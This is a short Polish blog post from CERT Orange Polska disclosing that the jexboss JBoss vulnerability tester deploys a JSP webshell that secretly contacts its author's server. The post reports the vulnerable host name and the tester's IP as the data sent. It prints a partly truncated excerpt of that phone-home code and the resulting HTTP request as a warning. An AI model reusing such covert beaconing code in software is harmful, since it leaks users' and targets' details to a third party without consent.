Zaloguj się do usług
bezpieczeństwa
9 listopada 2018
Przetestuj się sam... ale uważaj!

W codziennej pracy w CERT Orange Polska wykorzystujemy wiele mniej lub bardziej popularnych narzędzi, których zdarza się nam używać do testowania m.in. podatności aplikacji, czy serwerów. Przypadek jednego z takich programów udowadnia, że - to w sumie nic nowego - nikomu nie należy przesadnie ufać, a przede wszystkim warto przyjrzeć się nowym rozwiązaniom zawczasu.

Teoretycznie narzędzie jexboss ma służyć do testowania serwera aplikacji JBoss pod kątem wykrycia (a następnie rzecz oczywista załatania) potencjalnych podatności. Wszystko wygląda bez zarzutów, do momentu, gdy przyjrzyjmy się dokładniej aktywności umieszczanego na testowanym hoście pliku jsp (jboasass.jsp/jexws4.jsp/jexws*.jsp).

 try {
  if (request.getHeader("no-check-updates") == null) {
   HttpURLConnection c = (HttpURLConnection) new URL("http://webshell.jexboss.net/jsp_version.txt").openConnection();
   c.setRequestProperty("User-Agent", request.getHeader("Host") + "<-" + request.getRemoteAddr());

   if (!new File("check_" + lhc).exists()) {
    PrintWriter w = new PrintWriter("check_" + lhc);
    w.close();
    br = new BufferedReader(new InputStreamReader(c.getInputStream()));
    String lv = br.readLine().split(" ")[1];
    if (!lv.equals("4")) {
     out.print("New version. Please update!");
    }
   } else if (sh.indexOf("id") != -1 || sh.indexOf("ipconfig") != -1) {
    c.
   }
  }
} catch (Exception e) {
  out.println("Failed to check for updates");
}

Jak widać w zaznaczonym na czerwono fragmencie, oprogramowanie wykonuje połączenie do serwera twórcy oprogramowania (http://webshell.jexboss.net), gdzie przesyłane są m.in. nazwa podatnego hosta, oraz IP urządzenia, z którego następuje exploitacja. W rezultacie skrypt wykonuje odpytanie do hosta twórcy (wykonując jednocześnie komendy exploitującego):

GET /jsp_version.txt HTTP/1.1
User-Agent: example.com<-192.168.1.1
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
connection: keep-alive

Pamiętajcie - choć internet jest pełen użytecznych narzędzi, gdy używamy ich do poważniejszych zadań, warto im się wcześniej przyjrzeć w kontrolowanym środowisku.

Grafika: Bluecoat


Masz ciekawą informację?

Poinformuj nas!

Zgłoś incydent

Załącz plik

(jeśli zgłaszasz przypadek phishingu, zapisz mail (przesuń go z programu pocztowego na pulpit komputera lub wybierz opcję plik/zapisz jako), a następnie załącz)

Nie jestem człowiekiem
Jeśli zgłoszenie dotyczy bezpieczeństwa dzieci, zgłoś je również pod http://www.dyzurnet.pl